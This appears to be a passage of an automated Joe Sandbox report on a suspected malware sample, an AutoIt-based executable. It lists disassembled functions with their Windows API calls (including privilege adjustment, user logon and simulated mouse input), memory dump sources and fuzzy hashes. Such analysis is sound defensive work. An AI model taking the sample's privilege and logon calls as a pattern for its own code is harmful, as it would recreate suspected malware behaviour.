                                          Function 0096A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00979468,?,0098FB84,?), ref: 0096A097
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00979468,?,0098FB84,?), ref: 0096A0A9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 9be341a06e8026403f52bdf114533c47f9ae2865f0b08b15a1d2f99e5c01adfa
                                          • Instruction ID: 7680782d9b54a25b0fd081940e0804044f66201c7322c8745941f331eaf00dc6
                                          • Opcode Fuzzy Hash: 9be341a06e8026403f52bdf114533c47f9ae2865f0b08b15a1d2f99e5c01adfa
                                          • Instruction Fuzzy Hash: CDF0A73551922DBBDB21AFA4DC48FEA776CFF09361F004166F919D7291DA309940CFA1
                                          Function 009581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00958309), ref: 009581E0
                                          • CloseHandle.KERNEL32(?,?,00958309), ref: 009581F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 7da603a2777b27b2b1098595c8236f035ec01b082d54271b5c6a7b89b854e637
                                          • Instruction ID: 593871ea2f5a9b01e3ce5a32d111111d073dbdb3e6301307207c8e6122b9bef2
                                          • Opcode Fuzzy Hash: 7da603a2777b27b2b1098595c8236f035ec01b082d54271b5c6a7b89b854e637
                                          • Instruction Fuzzy Hash: 05E08C32014620AFE7212B60FC08E737BEEEF44310720882DF8AAC0431CB22AC90EB10
                                          Function 0092A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00928D57,?,?,?,00000001), ref: 0092A15A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0092A163
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 202d7a3cc6c9db7ad1c6450db089d58bc785802475c36eec1ea5a2bf53a91bad
                                          • Instruction ID: bff69cd393c543e54170b697468b802d684971c4b9e40be6e52b8e0aef740e07
                                          • Opcode Fuzzy Hash: 202d7a3cc6c9db7ad1c6450db089d58bc785802475c36eec1ea5a2bf53a91bad
                                          • Instruction Fuzzy Hash: 1FB09231268308ABCA002B91EC19B883F68EB46BE2F405022F60D84260CB625450AB91
                                          Function 0092F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50ba0621b89f798e09ab8a50fe7fce8624c68785c888960acb3195174c9c8e04
                                          • Instruction ID: 3007c2e87ffafe5b6c30ffd0ed8d2f7177a31ac66238625bc6534dc03807e27b
                                          • Opcode Fuzzy Hash: 50ba0621b89f798e09ab8a50fe7fce8624c68785c888960acb3195174c9c8e04
                                          • Instruction Fuzzy Hash: F432E025D39F114DD7239638E832336A29CAFB73C4F15D737E81AB5AA9EF2984835100
                                          Function 0093242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d9d4ac03389ceda8adf426fb43d6b81497f3e0080363a1f3871e560304fb23a
                                          • Instruction ID: 95b05d940cc2b9b8852046a685c6372e8129301d7af7fb6408f15fd9a6fcff4f
                                          • Opcode Fuzzy Hash: 7d9d4ac03389ceda8adf426fb43d6b81497f3e0080363a1f3871e560304fb23a
                                          • Instruction Fuzzy Hash: 67B1CD20E3AF414DD72396398832336BA9CAFBB6D5F51D71BFC2674D22EB2185835181
                                          Function 00968889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __time64.LIBCMT ref: 0096889B
                                            • Part of subcall function 0092520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00968F6E,00000000,?,?,?,?,0096911F,00000000,?), ref: 00925213
                                            • Part of subcall function 0092520A: __aulldiv.LIBCMT ref: 00925233
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID:
                                          • API String ID: 2893107130-0
                                          • Opcode ID: fdeff1df9fe301b96f45bcb28ff4db092debfcb249101d7a0909669765181cfd
                                          • Instruction ID: 4a7e6017d1753d538201121bcb65a64d866e9f9dbc5c3efe6bf58d473a51f8e2
                                          • Opcode Fuzzy Hash: fdeff1df9fe301b96f45bcb28ff4db092debfcb249101d7a0909669765181cfd
                                          • Instruction Fuzzy Hash: 4621A232A356108BC729CF29D841A52B3E5EBA5311B688F6CE0F5CB2C0CA34A905DB54
                                          Function 00964C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00964C4A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: a4df49540441ed98ecc4444ca78601b6c43d75a875685bc45bcee5cb58cb3517
                                          • Instruction ID: 8e7e84fa3cbda3b0f6a0b1edc38e56273fea6a0354291600fe7a42c8a6e6df5e
                                          • Opcode Fuzzy Hash: a4df49540441ed98ecc4444ca78601b6c43d75a875685bc45bcee5cb58cb3517
                                          • Instruction Fuzzy Hash: FED05EA116521938EC1C07A0DE2FFFA010CE340782FD095497181CA2C1EC8C9C406530
                                          Function 009587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00958389), ref: 009587D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: 0dbc22a33d5e4c6f578b89b0efc28f1694c22251975585b77764bd196643b15f
                                          • Instruction ID: e821fd62a9de4dd8ca6bed6d0493a7edb8c049a309bf6e4dd3eab9460be2d2af
                                          • Opcode Fuzzy Hash: 0dbc22a33d5e4c6f578b89b0efc28f1694c22251975585b77764bd196643b15f
                                          • Instruction Fuzzy Hash: 92D09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                          Function 0092A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0092A12A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 5119241a8ffde05ed1e0d764b937b999d0aa1335f7f0a7b3aab1b701c1b2cecc
                                          • Instruction ID: 4bd04198973f83390963a2c9c0885c778c6410febe6485b2d00dc948fbf4a7cb
                                          • Opcode Fuzzy Hash: 5119241a8ffde05ed1e0d764b937b999d0aa1335f7f0a7b3aab1b701c1b2cecc
                                          • Instruction Fuzzy Hash: C7A0123001410CA78A001B41EC044447F5CD6012D07004021F40C80121873254105680
                                          Function 00918808 Relevance: .6, Instructions: 590COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3b50905d788a896ecc76ed6f2706157d245fe9842f5040f1d1e44eccde34674
                                          • Instruction ID: 86988fd44034159ab5b2800a6e1ecb1ea79cb8d9c0f50e35e9749b668d918c3a
                                          • Opcode Fuzzy Hash: b3b50905d788a896ecc76ed6f2706157d245fe9842f5040f1d1e44eccde34674
                                          • Instruction Fuzzy Hash: A5225730B0850ACBDF28CB25C0A43BE77A9FF41345F29896AD9568B592DB34DCC5E741
                                          Function 009221C5 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 7737b336e55eec9fdc2343b0c379391158046907b82f9a831f13f682cf63d84f
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: A4C196322051B349DF2D4739A43443EFBA55EA27B131A076EE4B3CB1D8EE24D935D660
                                          Function 009225FA Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 13975bd480c3f3f007959d32780e2cefaf681829b7cb3ac16a4b962c44c68d99
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: ACC185332091B349DF2D4739D43413EBAA95EA27B131B076ED4B2DB1D8EE10D935D660
                                          Function 00921D90 Relevance: .3, Instructions: 331COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: 5723ef58d92dbab64f7619d79fbb463c68d3145828a56ef9a7aff1fd68dc92f1
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: C4C195322491B34ADF2D4639A43403EBAA55EB27B131B076ED8B3DB1D9EE10C935D660
                                          Function 00921978 Relevance: .3, Instructions: 323COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: 6346d66f8400e3ca1029c320d4fcfa59de49e297169fc47e589a2fe5122eea22
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 98C1A1362450B349DF2D863AE43413EBAA55EB27B131B076ED4B3CB1D8EE20C975D660
                                          Function 01273860 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction ID: 9b734d0eac264bcfc4158c718d9b820ce4838a37ac234ec86facc8811db8db23
                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction Fuzzy Hash: B741D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                          Function 012736F0 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction ID: f2a356bfac3b683df10aed8e63ccd31f8dc2bd4dbf19953edd9ce3aa197fdf73
                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction Fuzzy Hash: FD019278A10109EFCB48DF98C5909AEF7F5FB48310F208599D909A7701E731AE41DB80
                                          Function 01273750 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction ID: 839c62f249df25db5cb85fc4304260c74378e8bc2eb9cda56b9ed8d45a2d8239
                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction Fuzzy Hash: 3A01A478A10109EFCB48DF98C5909AEF7F5FF48310F208699D919A7301E730AE41DB80
                                          Function 012720A0 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                          Function 00977806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0097785B
                                          • DeleteObject.GDI32(00000000), ref: 0097786D
                                          • DestroyWindow.USER32 ref: 0097787B
                                          • GetDesktopWindow.USER32 ref: 00977895
                                          • GetWindowRect.USER32(00000000), ref: 0097789C
                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009779DD
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009779ED
                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977A35
                                          • GetClientRect.USER32(00000000,?), ref: 00977A41
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00977A7B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977A9D
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AB0
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977ABB
                                          • GlobalLock.KERNEL32(00000000), ref: 00977AC4
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AD3
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00977ADC
                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AE3
                                          • GlobalFree.KERNEL32(00000000), ref: 00977AEE
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977B00
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00992CAC,00000000), ref: 00977B16
                                          • GlobalFree.KERNEL32(00000000), ref: 00977B26
                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00977B4C
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00977B6B
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977B8D
                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977D7A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          • Opcode ID: 5ec602197943f4eb9f243d50ef025b08999abc24cdd0b107fe688beda94cbb31
                                          • Instruction ID: 413dd58bc5d04ef21abb12ebe495d2ab4cb96b993a37313867f2a22f18f531e6
                                          • Opcode Fuzzy Hash: 5ec602197943f4eb9f243d50ef025b08999abc24cdd0b107fe688beda94cbb31
                                          • Instruction Fuzzy Hash: EB028B72914109EFDB14DFA4CC99EAEBBB9EF48310F148159F919AB3A1C730AD41DB60
                                          Function 0098356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
